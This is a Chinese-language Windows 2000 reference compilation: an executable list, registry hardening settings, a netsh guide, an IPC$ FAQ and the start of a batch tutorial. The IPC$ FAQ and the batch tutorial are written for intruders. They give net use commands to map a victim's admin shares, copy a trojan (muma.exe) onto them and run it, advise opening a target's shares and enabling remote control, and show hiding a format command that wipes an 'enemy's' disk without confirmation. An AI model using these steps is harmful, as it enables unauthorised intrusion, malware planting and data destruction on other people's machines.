label.exe > Change label for drives 改变驱动器的卷标
lcwiz.exe > License Compliance Wizard for local or remote systems. 许可证符合向导
ldifde.exe > LDIF cmd line manager LDIF目录交换命令行管理
licmgr.exe > Terminal Server License Manager 终端服务许可协议管理
lights.exe > display connection status lights 显示连接状况
llsmgr.exe > Windows 2000 License Manager 2000许可协议管理
llssrv.exe > Start the license Server 启动许可协议服务器
lnkstub.exe >
locator.exe > RPC Locator 远程定位
lodctr.exe > Load perfmon counters 调用性能计数
logoff.exe > Log current user off. 注销用户
lpq.exe > Displays status of a remote LPD queue 显示远端的LPD打印队列的状态,显示被送到基于Unix的服务器的打印任务
lpr.exe > Send a print job to a network printer. 重定向打印任务到网络中的打印机。通常用于Unix客户打印机将打印任务发送给连接了打印设备的NT的打印机服务器。
lsass.exe > LSA Executable and Server DLL 运行LSA和Server的DLL
lserver.exe > Specifies the new DNS domain for the default server 指定默认Server新的DNS域
macfile.exe > Used for managing MACFILES 管理MACFILES
magnify.exe > Used to magnify the current screen 放大镜
makecab.exe > MS Cabinet Maker 制作CAB文件
mdm.exe > Machine Debug Manager 机器调试管理
mem.exe > Display current Memory stats 显示内存状态
migpwd.exe > Migrate passwords. 迁移密码
mmc.exe > Microsoft Management Console 控制台
mnmsrvc.exe > Netmeeting Remote Desktop Sharing NetMeeting远程桌面共享
mobsync.exe > Manage Synchronization. 同步目录管理器
mountvol.exe > Creates, deletes, or lists a volume mount point. 创建、删除或列出卷的装入点。
mplay32.exe > MS Media Player 媒体播放器
mpnotify.exe > Multiple Provider Notification application 多提供者通知应用程序
mq1sync.exe >
mqbkup.exe > MS Message Queue Backup and Restore Utility 信息队列备份和恢复工具
mqexchng.exe > MSMQ Exchange Connector Setup 信息队列交换连接设置
mqmig.exe > MSMQ Migration Utility 信息队列迁移工具
mqsvc.exe > ?
mrinfo.exe > Multicast routing using SNMP 使用SNMP多点传送路由
mscdexnt.exe > Installs MSCD (MS CD Extensions) 安装MSCD
msdtc.exe > Dynamic Transaction Controller Console 动态事务处理控制台
msg.exe > Send a message to a user local or remote. 发送消息到本地或远程客户
mshta.exe > HTML Application HOST HTML应用程序主机
msiexec.exe > Starts Windows Installer Program 开始Windows安装程序
mspaint.exe > Microsoft Paint 画板
msswchx.exe >
mstask.exe > Task Schedule Program 任务计划表程序
mstinit.exe > Task scheduler setup 任务计划表安装
narrator.exe > Program will allow you to have a narrator for reading. Microsoft讲述人
nbtstat.exe > Displays protocol stats and current TCP/IP connections using NBT 使用 NBT(TCP/IP 上的 NetBIOS)显示协议统计和当前 TCP/IP 连接。
nddeapir.exe > NDDE API Server side NDDE API服务器端
net.exe > Net Utility 详细用法看/?
net1.exe > Net Utility updated version from MS Net的升级版
netdde.exe > Network DDE will install itself into the background 安装自己到后台
netsh.exe > Creates a shell for network information 用于配置和监控 Windows 2000 命令行脚本接口。
netstat.exe > Displays current connections. 显示协议统计和当前的 TCP/IP 网络连接。
nlsfunc.exe > Loads country-specific information 加载特定国家(地区)的信息。Windows 2000 和 MS-DOS 子系统不使用该命令。接受该命令只是为了与 MS-DOS 文件兼容。
notepad.exe > Opens Windows 2000 Notepad 记事本
nslookup.exe > Displays information for DNS 该诊断工具显示来自域名系统 (DNS) 名称服务器的信息。
ntbackup.exe > Opens the NT Backup Utility 备份和故障修复工具
ntbooks.exe > Starts Windows Help Utility 帮助
ntdsutil.exe > Performs DB maintenance of the ADSI 完成ADSI的DB的维护
ntfrs.exe > NT File Replication Service NT文件复制服务
ntfrsupg.exe >
ntkrnlpa.exe > Kernel patch 核心补丁
ntoskrnl.exe > Core NT Kernel KT的核心
ntsd.exe >
ntvdm.exe > Simulates a 16-bit Windows environment 模拟16位Windows环境
nw16.exe > Netware Redirector NetWare转向器
nwscript.exe > runs netware scripts 运行Netware脚本
odbcad32.exe > ODBC 32-bit Administrator 32位ODBC管理
odbcconf.exe > Configure ODBC driver's and data source's from command line 命令行配置ODBC驱动和数据源
os2.exe > An OS/2 Warp Server (os2 /o) OS/2
os2srv.exe > An OS/2 Warp Server OS/2
os2ss.exe > An OS/2 Warp Server OS/2
osk.exe > On Screen Keyboard 屏幕键盘
packager.exe > Windows 2000 Packager Manager 对象包装程序
pathping.exe > Combination of Ping and Tracert 包含Ping和Tracert的程序
pax.exe > is a POSIX program and path names used as arguments must be specified in POSIX format. Use "file://C/Users/Default" instead of "C:\USERS\DEFAULT." 启动便携式存档互换 (Pax) 实用程序
pentnt.exe > Used to check the Pentium for the floating point division error. 检查Pentium的浮点错误
perfmon.exe > Starts Windows Performance Monitor 性能监视器
ping.exe > Packet Internet Groper 验证与远程计算机的连接
posix.exe > Used for backward compatibility with Unix 用于兼容Unix
print.exe > Cmd line used to print files 打印文本文件或显示打印队列的内容。
progman.exe > Program manager 程序管理器
proquota.exe > Profile quota program
psxss.exe > POSIX Subsystem Application Posix子系统应用程序
qappsrv.exe > Displays the available application terminal servers on the network
在网络上显示终端服务器可用的程序
qprocess.exe > Display information about processes local or remote 在本地或远程显示进程的信息(需终端服务)
query.exe > Query TERMSERVER user process and sessions 查询进程和对话
quser.exe > Display information about a user logged on 显示用户登陆的信息(需终端服务)
qwinsta.exe > Display information about Terminal Sessions. 显示终端服务的信息
rasadmin.exe > Start the remote access admin service 启动远程访问服务
rasautou.exe > Creates a RAS connection 建立一个RAS连接
rasdial.exe > Dial a connection 拨号连接
rasphone.exe > Starts a RAS connection 运行RAS连接
rcp.exe > Copies a file from and to a RCP service. 在 Windows 2000 计算机和运行远程外壳端口监控程序 rshd 的系统之间复制文件
rdpclip.exe > RdpClip allows you to copy and paste files between a terminal session and client console session. 再终端和本地复制和粘贴文件
recover.exe > Recovers readable information from a bad or defective disk 从坏的或有缺陷的磁盘中恢复可读取的信息。
redir.exe > Starts the redirector service 运行重定向服务
regedt32.exe > 32-bit register service 32位注册服务
regini.exe > modify registry permissions from within a script 用脚本修改注册许可
register.exe > Register a program so it can have special execution characteristics. 注册包含特殊运行字符的程序
regsvc.exe >
regsvr32.exe > Registers and unregister's dll's. As to how and where it register's them I dont know. 注册和反注册DLL
regtrace.exe > Options to tune debug options for applications failing to dump trace statements
Trace 设置
regwiz.exe > Registration Wizard 注册向导
remrras.exe >
replace.exe > Replace files 用源目录中的同名文件替换目标目录中的文件。
reset.exe > Reset an active section 重置活动部分
rexec.exe > Runs commands on remote hosts running the REXEC service. 在运行 REXEC 服务的远程计算机上运行命令。rexec 命令在执行指定命令前,验证远程计算机上的用户名,只有安装了 TCP/IP 协议后才可以使用该命令。
risetup.exe > Starts the Remote Installation Service Wizard. 运行远程安装向导服务
route.exe > display or edit the current routing tables. 控制网络路由表
routemon.exe > no longer supported 不再支持了!
router.exe > Router software that runs either on a dedicated DOS or on an OS/2 system. Route软件在 DOS或者是OS/2系统
rsh.exe > Runs commands on remote hosts running the RSH service 在运行 RSH 服务的远程计算机上运行命令
rsm.exe > Mounts and configures remote system media 配置远程系统媒体
rsnotify.exe > Remote storage notification recall 远程存储通知回显
rsvp.exe > Resource reservation protocol 源预约协议
runas.exe > RUN a program as another user 允许用户用其他权限运行指定的工具和程序
rundll32.exe > Launches a 32-bit dll program 启动32位DLL程序
runonce.exe > Causes a program to run during startup 运行程序再开始菜单中
rwinsta.exe > Reset the session subsystem hardware and software to known initial values 重置会话子系统硬件和软件到最初的值
savedump.exe > Does not write to e:\winnt\user.dmp 不写入User.dmp中
scardsvr.exe > Smart Card resource management server 子能卡资源管理服务器
schupgr.exe > It will read the schema update files (.ldf files) and upgrade the schema. (part of ADSI) 读取计划更新文件和更新计划
secedit.exe > Starts Security Editor help 自动安全性配置管理
services.exe > Controls all the services 控制所有服务
sethc.exe > Set High Contrast - changes colours and display mode Logoff to set it back to normal 设置高对比
setreg.exe > Shows the Software Publishing State Key Values 显示软件发布的国家语言
setup.exe > GUI box prompts you to goto control panel to configure system components 安装程序(转到控制面板)
setver.exe > Set Version for Files 设置 MS-DOS 子系统向程序报告的 MS-DOS 版本号
sfc.exe > System File Checker test and check system files for integrity 系统文件检查
sfmprint.exe > Print Services for Macintosh 打印Macintosh服务
sfmpsexe.exe >
sfmsvc.exe >
shadow.exe > Monitor another Terminal Services session. 监控另外一台中端服务器会话
share.exe > Windows 2000 和 MS-DOS 子系统不使用该命令。接受该命令只是为了与 MS-DOS 文件兼容
shmgrate.exe >
shrpubw.exe > Create and Share folders 建立和共享文件夹
sigverif.exe > File Signature Verification 文件签名验证
skeys.exe > Serial Keys utility 序列号制作工具
smlogsvc.exe > Performance Logs and Alerts 性能日志和警报
smss.exe >
sndrec32.exe > starts the Windows Sound Recorder 录音机
sndvol32.exe > Display the current volume information 显示声音控制信息
snmp.exe > Simple Network Management Protocol used for Network Mangement 简单网络管理协议
snmptrap.exe > Utility used with SNMP SNMP工具
sol.exe > Windows Solitaire Game 纸牌
sort.exe > Compares files and Folders 读取输入、排序数据并将结果写到屏幕、文件和其他设备上
SPOOLSV.EXE > Part of the spooler service for printing 打印池服务的一部分
sprestrt.exe >
srvmgr.exe > Starts the Windows Server Manager 服务器管理器
stimon.exe > WDM StillImage- > Monitor
stisvc.exe > WDM StillImage- > Service
subst.exe > Associates a path with a drive letter 将路径与驱动器盘符关联
svchost.exe > Svchost.exe is a generic host process name for services that are run from dynamic-link libraries (DLLs). DLL得主进程
syncapp.exe > Creates Windows Briefcase. 创建Windows文件包
sysedit.exe > Opens Editor for 4 system files 系统配置编辑器
syskey.exe > Encrypt and secure system database NT账号数据库按群工具
sysocmgr.exe > Windows 2000 Setup 2000安装程序
systray.exe > Starts the systray in the lower right corner. 在低权限运行systray
taskman.exe > Task Manager 任务管理器
taskmgr.exe > Starts the Windows 2000 Task Manager 任务管理器
tcmsetup.exe > telephony client wizard 电话服务客户安装
tcpsvcs.exe > TCP Services TCP服务
.exe > Telnet Utility used to connect to Telnet Server
termsrv.exe > Terminal Server 终端服务
tftp.exe > Trivial FTP 将文件传输到正在运行 TFTP 服务的远程计算机或从正在运行 TFTP 服务的远程计算机传输文件
tftpd.exe > Trivial FTP Daemon
themes.exe > Change Windows Themes 桌面主题
tlntadmn.exe > Telnet Server Administrator Telnet服务管理
tlntsess.exe > Display the current Telnet Sessions 显示目前的Telnet会话
tlntsvr.exe > Start the Telnet Server 开始Telnet服务
tracert.exe > Trace a route to display paths 该诊断实用程序将包含不同生存时间 (TTL) 值的 Internet 控制消息协议 (ICMP) 回显数据包发送到目标,以决定到达目标采用的路由
tsadmin.exe > Terminal Server Administrator 终端服务管理器
tscon.exe > Attaches a user session to a terminal session. 粘贴用户会话到终端对话
tsdiscon.exe > Disconnect a user from a terminal session 断开终端服务的用户
tskill.exe > Kill a Terminal server process 杀掉终端服务
tsprof.exe > Used with Terminal Server to query results. 用终端服务得出查询结果
tsshutdn.exe > Shutdown the system 关闭系统
unlodctr.exe > Part of performance monitoring 性能监视器的一部分
upg351db.exe > Upgrade a jet database 升级Jet数据库
ups.exe > UPS service UPS服务
user.exe > Core Windows Service Windows核心服务
userinit.exe > Part of the winlogon process Winlogon进程的一部分
usrmgr.exe > Start the windows user manager for domains 域用户管理器
utilman.exe > This tool enables an administrator to designate which computers automatically open accessibility tools when Windows 2000 starts. 指定2000启动时自动打开那台机器
verifier.exe > Driver Verifier Manager Driver Verifier Manager
vwipxspx.exe > Loads IPX/SPX VDM 调用IPX/SPX VDM
w32tm.exe > Windows Time Server 时间服务器
wextract.exe > Used to extract windows files 解压缩Windows文件
winchat.exe > Opens Windows Chat 打开Windows聊天
winhlp32.exe > Starts the Windows Help System 运行帮助系统
winlogon.exe > Used as part of the logon process. Logon进程的一部分
winmine.exe > windows Game 挖地雷
winmsd.exe > Windows Diagnostic utility 系统信息
wins.exe > Wins Service Wins服务
winspool.exe > Print Routing 打印路由
winver.exe > Displays the current version of Windows 显示Windows版本
wizmgr.exe > Starts Windows Administration Wizards Windows管理向导
wjview.exe > Command line loader for Java 命令行调用Java
wowdeb.exe > . For starters, the 32-bit APIs require that the WOWDEB.EXE task runs in the target debugee's VM 启动时,32位API需要
wowexec.exe > For running Windows over Windows Applications 在Windows应用程序上运行Windows
wpnpinst.exe > ?
write.exe > Starts MS Write Program 写字板
wscript.exe > Windows Scripting Utility 脚本工具
wupdmgr.exe > Starts the Windows update Wizard (Internet) 运行Windows升级向导
xcopy.exe > Used to copy directories 复制文件和目录,包括子目录
1、设置生存时间
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
DefaultTTL REG_DWORD 0-0xff(0-255 十进制,默认值128)
说明:指定传出IP数据包中设置的默认生存时间(TTL)值。TTL决定了IP数据包在到达目标前在网络中生存的最大时间。它实际上限定了IP数据包在丢弃前允许通过的路由器数量.有时利用此数值来探测远程主机操作系统。 2、防止ICMP重定向报文的攻击
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
EnableICMPRedirects REG_DWORD 0x0(默认值为0x1)
说明:该参数控制Windows 2000是否会改变其路由表以响应网络设备(如路由器)发送给它的ICMP重定向消息,有时会被利用来干坏事.Win2000中默认值为1,表示响应ICMP重定向报文。
3、禁止响应ICMP路由通告报文
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Inter
faces\interface
PerformRouterDiscovery REG_DWORD 0x0(默认值为0x2)
说明:"ICMP路由公告"功能可造成他人计算机的网络连接异常,数据被窃听,计算机被用于流量攻击等严重后果.此问题曾导致校园网某些局域网大面积,长时间的网络异常。因此建议关闭响应ICMP路由通告报文.Win2000中默认值为2,表示当DHCP发送路由器发现选项时启用。
4、防止SYN洪水攻击
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
SynAttackProtect REG_DWORD 0x2(默认值为0x0)
说明:SYN攻击保护包括减少SYN-ACK重新传输次数,以减少分配资源所保留的时间。路由缓存项资源分配延迟,直到建立连接为止.如果synattackprotect=2,则AFD的连接指示一直延迟到三路握手完成为止.注意,仅在TcpMaxHalfOpen和TcpMaxHalfOpenRetried设置超出范围时,保护机制才会采取措施。
5、禁止C$、D$一类的缺省共享
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters
AutoShareServer、REG_DWORD、0x0
6、禁止ADMIN$缺省共享
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters
AutoShareWks、REG_DWORD、0x0
7、限制IPC$缺省共享
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
restrictanonymous REG_DWORD 0x0 缺省
0x1 匿名用户无法列举本机用户列表
0x2 匿名用户无法连接本机IPC$共享
说明:不建议使用2,否则可能会造成你的一些服务无法启动,如SQL Server
8、不支持IGMP协议
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
IGMPLevel REG_DWORD 0x0(默认值为0x2)
说明:记得Win9x下有个bug,就是用可以用IGMP使别人蓝屏,修改注册表可以修正这个bug.Win2000虽然没这个bug了,但IGMP并不是必要的,因此照样可以去掉。改成0后用route print将看不到那个讨厌的224.0.0.0项了。
9、设置arp缓存老化时间设置
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services:\Tcpip\Parameters
ArpCacheLife REG_DWORD 0-0xFFFFFFFF(秒数,默认值为120秒)
ArpCacheMinReferencedLife REG_DWORD 0-0xFFFFFFFF(秒数,默认值为600)
说明:如果ArpCacheLife大于或等于ArpCacheMinReferencedLife,则引用或未引用的ARP缓存项在ArpCacheLife秒后到期。如果ArpCacheLife小于ArpCacheMinReferencedLife,未引用项在ArpCacheLife秒后到期,而引用项在ArpCacheMinReferencedLife秒后到期。每次将出站数据包发送到项的IP地址时,就会引用ARP缓存中的项。
10、禁止死网关监测技术
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services:\Tcpip\Parameters
EnableDeadGWDetect REG_DWORD 0x0(默认值为ox1)
说明:如果你设置了多个网关,那么你的机器在处理多个连接有困难时,就会自动改用备份网关。有时候这并不是一项好主意,建议禁止死网关监测。
11、不支持路由功能
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services:\Tcpip\Parameters
IPEnableRouter REG_DWORD 0x0(默认值为0x0)
说明:把值设置为0x1可以使Win2000具备路由功能,由此带来不必要的问题。
12、做NAT时放大转换的对外端口最大值
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services:\Tcpip\Parameters
MaxUserPort REG_DWORD 5000-65534(十进制)(默认值0x1388--十进制为5000)
说明:当应用程序从系统请求可用的用户端口数时,该参数控制所使用的最大端口数。正常情况下,短期端口的分配数量为1024-5000。将该参数设置到有效范围以外时,就会使用最接近的有效数值(5000或65534)。使用NAT时建议把值放大点。
13、修改MAC地址
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\
找到右窗口的说明为"网卡"的目录,
比如说是{4D36E972-E325-11CE-BFC1-08002BE10318}
展开之,在其下的0000,0001,0002...的分支中找到"DriverDesc"的键值为你网卡的说明,比如说"DriverDesc"的值为"Intel(R) 82559 Fast Ethernet LAN on Motherboard"然后在右窗口新建一字符串值,名字为"Networkaddress",内容为你想要的MAC值,比如说是"004040404040"然后重起计算机,ipconfig /all看看。
曾几何时,大家都有想过在命令行下改IP和网关。以前在NT4下实现起来过于麻烦,现在Windows 2000下的Netsh命令能实现该功能了。
Netsh 是本地或远程计算机的 Windows 2000 网络组件的命令行和脚本实用程序。为了存档或配置其他服务器,Netsh 实用程序也可以将配置脚本保存在文本文件中。
Netsh 实用程序是一个外壳,它通过附加的"Netsh 帮助 DLL",可以支持多个 Windows 2000 组件。"Netsh 帮助 DLL"提供用来监视或配置特定 Windows 2000 网络组件的其他命令,从而扩展了 Netsh 的功能。每个"Netsh 帮助 DLL"都为特定的网络组件提供了一个环境和一组命令。每个环境中都可以有子环境。例如,在路由环境中存在子环境 Ip 和 Ipx,它们将 IP 路由和 IPX 路由命令集中在一起。
Netsh 命令行选项包括下列各项:
用法: netsh [-a AliasFile] [-c Context] [-r RemoteMachine]
[Command | -f ScriptFile]
下列指令有效:
此上下文中的命令:
? - 显示命令列表。
aaaa - 更改到 `aaaa' 上下文。
add - 将一个配置项添加到项目列表中。
delete - 在项目列表上删除一个配置项目。
dhcp - 更改到 `dhcp' 上下文。
dump 0 - 显示一个配置脚本。
exec - 运行一个脚本文件。
help - 显示命令列表。
interface - 更改到 `interface' 上下文。
ras - 更改到 `ras' 上下文。
routing - 更改到 `routing' 上下文。
set - 更新配置设置。
show - 显示信息
wins - 更改到 `wins' 上下文。
下列的子上下文可用:
routing interface ras dhcp wins aaaa
若需要命令的更多帮助信息,请键入命令,
后面跟 ?。
-a AliasFile
指定使用了一个别名文件。别名文件包含 netsh 命令列表和一个别名版本,所以可以使用别名命令行替换 netsh 命令。可以使用别名文件将其他平台中更熟悉的命令映射到适当的 netsh 命令。
-c Context
指定对应于已安装的支持 DLL 的命令环境。
命令
指定要执行的 netsh 命令。
-f ScriptFile
指定运行 ScriptFile 文件中所有的 netsh 命令。
-r RemoteMachine
指定在远程计算机上运行 netsh 命令,由名称或 IP 地址来指定远程计算机。
您可以将命令缩写为意义明确的最短的字符串。例如,发布 sh ip int 命令相当于发布 show ip interface。Netsh 命令可以是全局的或特定环境的。全局命令可以在任何环境中发布,并用于一般的 Netsh 实用程序功能。特定环境的命令随环境而变化。您可以将发布的命令记录在日志文件中,以创建 netsh 命令会话的审核踪迹。
列出了 netsh 全局命令。
命令 说明
.. 上移一个环境等级。
? 或 help 显示命令行"帮助"。
show version 显示 Windows 和 Netsh 实用程序的当前版本。
show netdlls 显示已安装的"Netsh 帮助 DLL"的当前版本。
add helper 添加"Netsh 帮助 DLL"。
delete helper 删除"Netsh 帮助 DLL"。
show helper 显示已安装的"Netsh 帮助 DLL"。
cmd 创建 Windows 2000 命令窗口。
online 将当前模式设置为联机。
offline 将当前模式设置为脱机。
set mode 将当前模式设置为联机或脱机。
show mode 显示当前模式。
flush 丢弃以脱机模式进行的任何更改。
commit 提交以脱机模式进行的更改。
set audit-logging 打开或关闭记录工具。
show audit-logging 显示当前的审核记录设置。
set loglevel 设置记录信息的级别
show loglevel 显示记录信息的级别。
set machine 配置执行 netsh 命令的计算机。
show machine 显示执行 netsh 命令的计算机。
exec 执行包括 netsh 命令的脚本文件。
quit 或 bye 或 exit 退出 Netsh 实用程序。
add alias 向现有命令添加别名。
delete alias 删除现有命令的别名。
show alias 显示所有已定义的别名。
dump 将配置写入文本文件。
popd 从堆栈中弹出环境的脚本命令。
pushd 将当前的环境推入堆栈的脚本命令。
Netsh 实用程序有如下命令模式:
联机
联机模式下,在 Netsh 命令提示符下发布的命令被立即执行。
脱机
脱机模式下,将在 Netsh 命令提示符下积累发布的命令,并通过发布 commit 全局命令来按照批处理方式执行。可以通过发布 flush 全局命令来丢弃积累的命令。
脚本
使用 -f 命令行选项,或在 Netsh 命令提示符下发布 exec 全局命令,可以执行指定文件中所有的 netsh 命令。
要创建当前配置的脚本,请使用 dump 全局命令。dump 命令根据 netsh 命令输出当前运行的配置。可以使用该命令创建的脚本来配置新的服务器或重新配置现有的服务器。如果要对组件的配置作很大的更改,推荐您使用 dump 命令开始配置会话,以防在进行更改前需要还原配置。
Interface 命令
下表列出了可在 Windows 2000 命令提示符下键入的 netsh 命令,这些命令用于管理运行 Windows 2000 Server 及"路由和远程访问"服务的计算机上的接口设置。如果对某个特殊功能有多个命令,则在每个命令之间用斜线 (/) 分隔。
当在命令提示符下键入命令时,请在每个命令前加上 netsh。要获得每个命令的精确语法,可在命令之后键入 ?。选项例如,要获得 netsh interface 命令的命令行"帮助",请在命令提示符下键入 netsh interface?。
命令 说明
interface set/show interface 启用、禁用、连接、断开连接以及显示请求拨号接口的配置。
interface set/show credentials 在请求拨号接口上配置或显示用户名、密码和域名。
言归正传,现在来看看WIN2000下的网络设置的配置。 D:\>netsh
netsh>interface
interface>dump
#========================
# 接口配置
#========================
pushd interface
reset all
popd
# 接口配置结束
# ----------------------------------
# 接口 IP 配置
# ----------------------------------
pushd interface ip
# "本地连接 2" 的接口 IP 配置
set address name = "本地连接 2" source = dhcp
set dns name = "本地连接 2" source = dhcp
set wins name = "本地连接 2" source = dhcp
# "本地连接" 的接口 IP 配置
set address name = "本地连接" source = static addr = 192.168.1.10 mask = 255.255.255.0
set address name = "本地连接" gateway = 192.168.0.1 gwmetric = 1
set dns name = "本地连接" source = static addr = 192.168.0.1
set wins name = "本地连接" source = static addr = none
popd
# 接口 IP 配置结束
如果,你想快速修改一个本地IP地址。
你可以先用文本写入以下的内容:
interface ip
set address 本地连接 static 192.168.5.10 255.255.255.0 192.168.0.1 1
^^^ ^^^ ^^^ ^^^ ^^
接口名称 IP地址 子网掩码 网关 接口跃点数
如上保存为 local.sh
D:\>netsh exec local.sh
ipc$常见问题:
1,怎样建立空连接,它有什么用?
答:使用命令 net use \IPipc$ "" /user:"" 就可以简单地和目标建立一个空连接(需要目标开放ipc$)。
对于NT,在默认安全设置下,借助空连接可以列举目标用户、共享,访问everyone权限的共享,访问小部分注册表等,没有什么利用价值。对2000作用就更小了。而且实现也不方便,需借助工具。
2.为什么我连不上IPC$?
答:1.只有nt/2000/xp及以上系统才可以建立ipc$。如果你用的是98/me是没有该功能的。
2.确认你的命令没有打错。正确的命令是: net use \目标IPipc$ "密码" /user:"用户名"
注意别多了或少了空格。当用户名和密码中不包含空格时两边的双引号可以省略。空密码用""表示。
3,根据返回的错误号分析原因:
错误号5,拒绝访问 : 很可能你使用的用户不是管理员权限的,先提升权限;
错误号51,Windows 无法找到网络路径 : 网络有问题;
错误号53,找不到网络路径 : ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);
错误号67,找不到网络名 : 你的lanmanworkstation服务未启动;目标删除了ipc$;
错误号1219,提供的凭据与已存在的凭据集冲突 : 你已经和对方建立了一个ipc$,请删除再连。
错误号1326,未知的用户名或错误密码 : 原因很明显了;
错误号1792,试图登录,但是网络登录服务没有启动 : 目标NetLogon服务未启动。(连接域控会出现此情况)
错误号2242,此用户的密码已经过期 : 目标有帐号策略,强制定期要求更改密码。
4,关于ipc$连不上的问题比较复杂,没有总结出一个统一的认识,在肉鸡上实验有时会得出矛盾的结论,十分棘手。 而且知道了问题所在,如果没有用其他办法获得shell,很多问题依然不能解决。
5,怎样打开目标的IPC$?
答:首先你需要获得一个不依赖于ipc$的shell,比如sql的cmd扩展、telnet、木马。当然,这shell必须是admin权限的。然后你可以使用shell执行命令 net share ipc$ 来开放目标的ipc$。从上一问题可以知道,ipc$能否使用还有很多条件。请确认相关服务都已运行,没有就启动它(不知道怎么做的请看net命令的用法)。还是不行的话(比如有防火墙,杀不了)建议放弃。
6,怎样映射和访问默认共享?
答:使用命令 net use z: \目标IPc$ "密码" /user:"用户名" 将对方的c盘映射为自己的z盘,其他盘类推。
如果已经和目标建立了ipc$,则可以直接用IP加盘符加$访问。比如 copy muma.exe \IPd$pathmuma.exe 。或者再映射也可以,只是不用用户名和密码了:net use y: \IPd$ 。然后 copy muma.exe y:pathmuma.exe 。当路径中包含空格时,须用""将路径全引住。
7,如何删除映射和ipc$连接?
答:用命令 net use \IPipc$ /del 删除和一个目标的ipc$连接。
用命令 net use z: /del 删除映射的z盘,其他盘类推。
用命令 net use * /del 删除全部。会有提示要求按y确认。
8,连上ipc$然后我能做什么?
答:能使用管理员权限的帐号成功和目标连接ipc$,表示你可以和对方系统做深入“交流”了。你可以使用各种命令行方式的工具(比如pstools系列、Win2000SrvReskit、telnethack等)获得目标信息、管理目标的进程和服务等。如果目标开放了默认共享(没开你就帮他开),你就可以上传木马并运行。也可以用tftp、ftp的办法上传。像dwrcc、VNC、RemoteAdmin等工具(木马)还具有直接控屏的功能。如果是2000server,还可以考虑开启终端服务方便控制。这里提到的工具的使用,请看自带的说明或相关教程。
9,怎样防止别人用ips$和默认共享入侵我?
答:A、一种办法是把ipc$和默认共享都删除了。但重起后还会有。这就需要改注册表。
1,先把已有的删除
net share ipc$ /del
net share admin$ /del
net share c$ /del
…………(有几个删几个)
2,禁止别人空连接
首先运行regedit,找到如下主键[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLSA]把RestrictAnonymous(DWORD)的键值改为:00000002。
3,禁止自动打开默认共享
对于server版,找到如下主键[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]把AutoShareServer(DWORD)的键值改为:00000000。
对于pro版,则是[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]把AutoShareWks(DWORD)的键值改为:00000000。
如果上面所说的主键不存在,就新建一个再改键值。
B、另一种是关闭ipc$和默认共享依赖的服务(不推荐)
net stop lanmanserver
可能会有提示说,XXX服务也会关闭是否继续。因为还有些次要的服务依赖于lanmanserver。一般情况按y继续就可以了。
C、最简单的办法是设置复杂密码,防止通过ipc$穷举密码。但如果你有其他漏洞,ipc$将为进一步入侵提供方便。
D、还有一个办法就是装防火墙,或者端口过滤。
简明批处理教程:
批处理命令如果运用得当,威力强大无人能敌!是不是想学习了呢,从今天我将把批处理的常用命令陆续的介绍给大家,如果大家有什么不懂的地方,可以写下评论:
批处理文件是无格式的文本文件,它包含一条或多条命令。它的文件扩展名为 .bat 或 .cmd。在命令提示下键入批处理文件的名称,或者双击该批处理文件,系统就会调用Cmd.exe按照该文件中各个命令出现的顺序来逐个运行它们。
一.简单批处理内部命令简介
1.Echo 命令
打开回显或关闭请求回显功能,或显示消息。如果没有任何参数,echo 命令将显示当前回显设置。
语法
echo [{on off}] [message]
Sample:@echo off / echo hello world
在实际应用中我们会把这条命令和重定向符号(也称为管道符号,一般用> >> )结合来实现输入一些命令到特定格式的文件中.这将在以后的例子中体现出来。
2.@ 命令
表示不显示@后面的命令,在入侵过程中(例如使用批处理来格式化敌人的硬盘)自然不能让对方看到你使用的命令啦。
Sample:@echo off
@echo Now initializing the program,please wait a minite...
@format X: /q/u/autoset (format 这个命令是不可以使用/y这个参数的,可喜的是微软留了个autoset这个参数给我们,效果和/y是一样的。)
3.Goto 命令
指定跳转到标签,找到标签后,程序将处理从下一行开始的命令。
语法:goto label (label是参数,指定所要转向的批处理程序中的行。)
Sample:
if {%1}=={} goto noparms
if {%2}=={} goto noparms(如果这里的if、%1、%2你不明白的话,先跳过去,后面会有详细的解释。)
@Rem check parameters if null show usage
:noparms
echo Usage: monitor.bat ServerIP PortNumber
goto end
标签的名字可以随便起,但是最好是有意义的字母啦,字母前加个:用来表示这个字母是标签,goto命令就是根据这个:来寻找下一步跳到到那里。最好有一些说明这样你别人看起来才会理解你的意图啊。
4.Rem 命令
注释命令,在C语言中相当与/*--------*/,它并不会被执行,只是起一个注释的作用,便于别人阅读和你自己日后修改。
Rem Message
Sample:@Rem Here is the description.
5.Pause 命令
运行 Pause 命令时,将显示下面的消息:
Press any key to continue . . .
Sample:
@echo off
:begin
copy a:*.* d:\back
echo Please put a new disk into driver A
pause
goto begin
在这个例子中,驱动器 A 中磁盘上的所有文件均复制到d:\back中。显示的注释提示您将另一张磁盘放入驱动器 A 时,pause 命令会使程序挂起,以便您更换磁盘,然后按任意键继续处理。
6.Call 命令
从一个批处理程序调用另一个批处理程序,并且不终止父批处理程序。call 命令接受用作调用目标的标签。如果在脚本或批处理文件外使用 Call,它将不会在命令行起作用。
语法
call [[Drive:][Path] FileName [BatchParameters]] [:label [arguments]]
参数
[Drive:}[Path] FileName
指定要调用的批处理程序的位置和名称。filename 参数必须具有 .bat 或 .cmd 扩展名。
7.start 命令
调用外部程序,所有的DOS命令和命令行程序都可以由start命令来调用。
入侵常用参数:
MIN 开始时窗口最小化
SEPARATE 在分开的空间内开始 16 位 Windows 程序
